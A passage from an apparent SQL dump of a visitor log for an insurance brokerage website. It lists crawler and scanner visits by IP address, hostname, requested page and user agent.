http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25896,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632097','69.30.213.202','69.30.213.202','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25898,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632109','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25901,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632120','69.30.213.202','69.30.213.202','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25904,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632131','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25905,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632144','69.30.213.202','69.30.213.202','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25908,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632154','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25911,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632165','69.30.213.202','69.30.213.202','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25913,'0b_dc744a0951af0a2027551d5637546ed0','1462633263','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25916,'0b_dc744a0951af0a2027551d5637546ed0','1462633267','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25919,'0b_dc744a0951af0a2027551d5637546ed0','1462633269','69.175.67.58','newscan04.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25920,'0b_dc744a0951af0a2027551d5637546ed0','1462633271','69.175.67.58','newscan04.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25922,'0b_dc744a0951af0a2027551d5637546ed0','1462633274','69.175.67.58','newscan04.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25923,'0b_dc744a0951af0a2027551d5637546ed0','1462633276','69.175.67.58','newscan04.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25926,'0b_dc744a0951af0a2027551d5637546ed0','1462633278','69.175.67.58','newscan04.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25928,'0b_dc744a0951af0a2027551d5637546ed0','1462633280','69.175.67.58','newscan04.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25929,'0b_8dfa8ee7c7b59f5f3c90fee322b5a3e3','1462636532','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25932,'0b_5700c81f315afbc803160b02ee54e799','1462637665','217.69.133.222','fetcher2-3.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(25934,'0b_5700c81f315afbc803160b02ee54e799','1462637666','217.69.133.225','fetcher2-6.p.mail.ru','/SSO/235_19.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25935,'0b_5700c81f315afbc803160b02ee54e799','1462637668','217.69.133.226','fetcher2-7.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25938,'0b_0679e199acffaf6244e07fd9d7dc24ad','1462637670','217.69.133.68','fetcher2.p.mail.ru','/SSO/235_19.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/SSO/235_19.html','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(25941,'0b_8a4790086c18f1dd6ce3116865be1443','1462638804','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25944,'0b_8a4790086c18f1dd6ce3116865be1443','1462638935','207.46.13.61','msnbot-207-46-13-61.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25946,'0b_555fb504810016dafe7bfbac500087dc','1462639383','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25947,'0b_d3153f193f50bce9c694e4060f963779','1462641599','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(25949,'0b_31932c9a3c9526a81ebdb670ed8f1973','1462642631','65.55.210.200','msnbot-65-55-210-200.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(25952,'0b_34452bb664fc6771e878517ce65d7904','1462643113','217.69.133.221','fetcher2-2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(25953,'0b_34452bb664fc6771e878517ce65d7904','1462643114','217.69.133.223','fetcher2-4.p.mail.ru','/SSO/235_39.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25955,'0b_34452bb664fc6771e878517ce65d7904','1462643119','217.69.133.225','fetcher2-6.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25956,'0b_34452bb664fc6771e878517ce65d7904','1462643121','217.69.133.223','fetcher2-4.p.mail.ru','/SSO/235_39.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/SSO/235_39.html','',0,'Linux','','ru','','','','','','','0','0',0),(25958,'0b_49a2853b2a3d9b463f21d0ec1d397dda','1462643984','50.252.212.14','50-252-212-14-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/43.0','http://empireins.com','',0,'Win7 x64','Firefox 43','gb','','','','','','','0','0',0),(25959,'0b_2f0fa0f3f83fd4556fa28f95acd5aeb2','1462645051','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25962,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645106','144.76.8.132','static.132.8.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25964,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645108','144.76.8.132','static.132.8.76.144.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25965,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645111','144.76.8.132','static.132.8.76.144.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25968,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645116','144.76.8.132','static.132.8.76.144.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25971,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645118','144.76.8.132','static.132.8.76.144.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25974,'0b_9d3556bb37a144b057422fa0dea9c0f3','1462645120','144.76.8.132','static.132.8.76.144.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25977,'0b_3ffdcc970f47173f315aa827ea277b9a','1462645859','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(25979,'0b_3ffdcc970f47173f315aa827ea277b9a','1462645871','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25982,'0b_6ffdffca72e7d6081dbb8341e0288df5','1462646047','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25985,'0b_d3f2acc4781f4ba6b33feee59962f10c','1462646546','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25986,'0b_d3f2acc4781f4ba6b33feee59962f10c','1462646548','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25989,'0b_d3f2acc4781f4ba6b33feee59962f10c','1462646859','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25992,'0b_7f1e140daaadecc449f168a17b616269','1462650418','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(25994,'0b_7f1e140daaadecc449f168a17b616269','1462650420','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(25995,'0b_4a257aeeb27efbd8f539364a610317d5','1462652224','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25997,'0b_c4e72383207cc6ca17ac74135f8625fc','1462653514','100.43.81.152','spider-100-43-81-152.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25998,'0b_f80c6df4bdacd5c1fc283300e51cf6af','1462658294','100.43.81.146','spider-100-43-81-146.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(26000,'0b_124187d964e221476d70c6f006df3003','1462660018','217.69.133.225','fetcher2-6.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26001,'0b_124187d964e221476d70c6f006df3003','1462660021','217.69.133.226','fetcher2-7.p.mail.ru','/calc.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26004,'0b_124187d964e221476d70c6f006df3003','1462660085','217.69.133.224','fetcher2-5.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26007,'0b_124187d964e221476d70c6f006df3003','1462660092','217.69.133.225','fetcher2-6.p.mail.ru','/calc.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/calc.html','',0,'Linux','','ru','','','','','','','0','0',0),(26010,'0b_c897a2e3ab8ea11b48384781e9d42de8','1462661712','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26013,'0b_92b1e0e66516c57b266fd47dd6bc631c','1462663744','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26016,'0b_59d6cc8d44e787867bf46442c6383b03','1462665638','217.69.133.68','fetcher2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26019,'0b_5d268d8ace1ba72490c9ad29915aed39','1462665640','217.69.133.226','fetcher2-7.p.mail.ru','/quotes.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(26021,'0b_5d268d8ace1ba72490c9ad29915aed39','1462665643','217.69.133.224','fetcher2-5.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26024,'0b_5d268d8ace1ba72490c9ad29915aed39','1462665644','217.69.133.220','fetcher2-1.p.mail.ru','/quotes.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/quotes.htm','',0,'Linux','','ru','','','','','','','0','0',0),(26025,'0b_c47de48646fa88a22d6c65a3d1cd05ce','1462665991','195.154.184.40','195-154-184-40.rev.poneytelecom.eu','/','Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0','','',0,'Win7','Firefox 34','eu','','','','','','','0','0',0),(26027,'0b_ecc74c8ffae28dbd84ce0e3324ad92e2','1462665992','195.154.184.40','195-154-184-40.rev.poneytelecom.eu','/','Go-http-client/1.1','http://empireins.com','',0,'','','eu','','','Go','','','','0','0',0),(26030,'0b_a62f3f9aab0d6cfe59811ac70fd73cdc','1462666750','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26031,'0b_3ba3ab60afc4774be697840f17e9a014','1462666750','79.116.24.187','79-116-24-187.rdsnet.ro','/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26033,'0b_3ba3ab60afc4774be697840f17e9a014','1462666753','79.116.24.187','79-116-24-187.rdsnet.ro','/about-us','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26034,'0b_3ba3ab60afc4774be697840f17e9a014','1462666754','79.116.24.187','79-116-24-187.rdsnet.ro','/about-us/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26036,'0b_3ba3ab60afc4774be697840f17e9a014','1462666755','79.116.24.187','79-116-24-187.rdsnet.ro','/agent-tools','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26037,'0b_3ba3ab60afc4774be697840f17e9a014','1462666756','79.116.24.187','79-116-24-187.rdsnet.ro','/agent-tools/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26039,'0b_3ba3ab60afc4774be697840f17e9a014','1462666757','79.116.24.187','79-116-24-187.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26042,'0b_3ba3ab60afc4774be697840f17e9a014','1462666758','79.116.24.187','79-116-24-187.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26043,'0b_3ba3ab60afc4774be697840f17e9a014','1462666759','79.116.24.187','79-116-24-187.rdsnet.ro','/carriers','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26045,'0b_3ba3ab60afc4774be697840f17e9a014','1462666760','79.116.24.187','79-116-24-187.rdsnet.ro','/carriers/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26046,'0b_3ba3ab60afc4774be697840f17e9a014','1462666761','79.116.24.187','79-116-24-187.rdsnet.ro','/case-status','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26049,'0b_3ba3ab60afc4774be697840f17e9a014','1462666762','79.116.24.187','79-116-24-187.rdsnet.ro','/case-status/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26052,'0b_3ba3ab60afc4774be697840f17e9a014','1462666764','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26054,'0b_3ba3ab60afc4774be697840f17e9a014','1462666764','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26057,'0b_3ba3ab60afc4774be697840f17e9a014','1462666765','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26060,'0b_3ba3ab60afc4774be697840f17e9a014','1462666766','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26061,'0b_3ba3ab60afc4774be697840f17e9a014','1462666768','79.116.24.187','79-116-24-187.rdsnet.ro','/contact','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26064,'0b_3ba3ab60afc4774be697840f17e9a014','1462666769','79.116.24.187','79-116-24-187.rdsnet.ro','/contact/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26066,'0b_3ba3ab60afc4774be697840f17e9a014','1462666770','79.116.24.187','79-116-24-187.rdsnet.ro','/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26069,'0b_3ba3ab60afc4774be697840f17e9a014','1462666771','79.116.24.187','79-116-24-187.rdsnet.ro','/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26070,'0b_3ba3ab60afc4774be697840f17e9a014','1462666772','79.116.24.187','79-116-24-187.rdsnet.ro','/forms','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26072,'0b_3ba3ab60afc4774be697840f17e9a014','1462666772','79.116.24.187','79-116-24-187.rdsnet.ro','/forms/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26073,'0b_3ba3ab60afc4774be697840f17e9a014','1462666777','79.116.24.187','79-116-24-187.rdsnet.ro','/igo','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26076,'0b_3ba3ab60afc4774be697840f17e9a014','1462666778','79.116.24.187','79-116-24-187.rdsnet.ro','/igo/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26079,'0b_3ba3ab60afc4774be697840f17e9a014','1462666779','79.116.24.187','79-116-24-187.rdsnet.ro','/insentives','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26081,'0b_3ba3ab60afc4774be697840f17e9a014','1462666780','79.116.24.187','79-116-24-187.rdsnet.ro','/insentives/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26084,'0b_3ba3ab60afc4774be697840f17e9a014','1462666781','79.116.24.187','79-116-24-187.rdsnet.ro','/licensing-contracting','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26085,'0b_3ba3ab60afc4774be697840f17e9a014','1462666782','79.116.24.187','79-116-24-187.rdsnet.ro','/licensing-contracting/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26087,'0b_3ba3ab60afc4774be697840f17e9a014','1462666784','79.116.24.187','79-116-24-187.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26090,'0b_3ba3ab60afc4774be697840f17e9a014','1462666785','79.116.24.187','79-116-24-187.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26093,'0b_3ba3ab60afc4774be697840f17e9a014','1462666786','79.116.24.187','79-116-24-187.rdsnet.ro','/register','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26094,'0b_3ba3ab60afc4774be697840f17e9a014','1462666787','79.116.24.187','79-116-24-187.rdsnet.ro','/register/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26096,'0b_3ba3ab60afc4774be697840f17e9a014','1462666788','79.116.24.187','79-116-24-187.rdsnet.ro','/term-quotes','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26099,'0b_3ba3ab60afc4774be697840f17e9a014','1462666789','79.116.24.187','79-116-24-187.rdsnet.ro','/term-quotes/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26100,'0b_3ba3ab60afc4774be697840f17e9a014','1462666790','79.116.24.187','79-116-24-187.rdsnet.ro','/?page_id=169','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26102,'0b_3ba3ab60afc4774be697840f17e9a014','1462666791','79.116.24.187','79-116-24-187.rdsnet.ro','/register/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26103,'0b_3ba3ab60afc4774be697840f17e9a014','1462666793','79.116.24.187','79-116-24-187.rdsnet.ro','/comments/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26105,'0b_3ba3ab60afc4774be697840f17e9a014','1462666793','79.116.24.187','79-116-24-187.rdsnet.ro','/comments/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26106,'0b_3ba3ab60afc4774be697840f17e9a014','1462666794','79.116.24.187','79-116-24-187.rdsnet.ro','/home/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26108,'0b_3ba3ab60afc4774be697840f17e9a014','1462666795','79.116.24.187','79-116-24-187.rdsnet.ro','/home/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26109,'0b_3ba3ab60afc4774be697840f17e9a014','1462666795','79.116.24.187','79-116-24-187.rdsnet.ro','/about-us/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26111,'0b_3ba3ab60afc4774be697840f17e9a014','1462666796','79.116.24.187','79-116-24-187.rdsnet.ro','/about-us/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26114,'0b_3ba3ab60afc4774be697840f17e9a014','1462666797','79.116.24.187','79-116-24-187.rdsnet.ro','/about-us/meet-the-eib-team','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26115,'0b_3ba3ab60afc4774be697840f17e9a014','1462666797','79.116.24.187','79-116-24-187.rdsnet.ro','/meet-the-eib-team/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26118,'0b_3ba3ab60afc4774be697840f17e9a014','1462666799','79.116.24.187','79-116-24-187.rdsnet.ro','/meet-the-eib-team','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26120,'0b_3ba3ab60afc4774be697840f17e9a014','1462666799','79.116.24.187','79-116-24-187.rdsnet.ro','/meet-the-eib-team/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26121,'0b_3ba3ab60afc4774be697840f17e9a014','1462666801','79.116.24.187','79-116-24-187.rdsnet.ro','/agent-tools/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26123,'0b_3ba3ab60afc4774be697840f17e9a014','1462666803','79.116.24.187','79-116-24-187.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26124,'0b_3ba3ab60afc4774be697840f17e9a014','1462666804','79.116.24.187','79-116-24-187.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26127,'0b_3ba3ab60afc4774be697840f17e9a014','1462666804','79.116.24.187','79-116-24-187.rdsnet.ro','/carriers/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26129,'0b_3ba3ab60afc4774be697840f17e9a014','1462666805','79.116.24.187','79-116-24-187.rdsnet.ro','/carriers/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26132,'0b_3ba3ab60afc4774be697840f17e9a014','1462666806','79.116.24.187','79-116-24-187.rdsnet.ro','/case-status/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26135,'0b_3ba3ab60afc4774be697840f17e9a014','1462666807','79.116.24.187','79-116-24-187.rdsnet.ro','/case-status/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26136,'0b_3ba3ab60afc4774be697840f17e9a014','1462666807','79.116.24.187','79-116-24-187.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(26139,'0b_3ba3ab60afc4774be697840f17e9a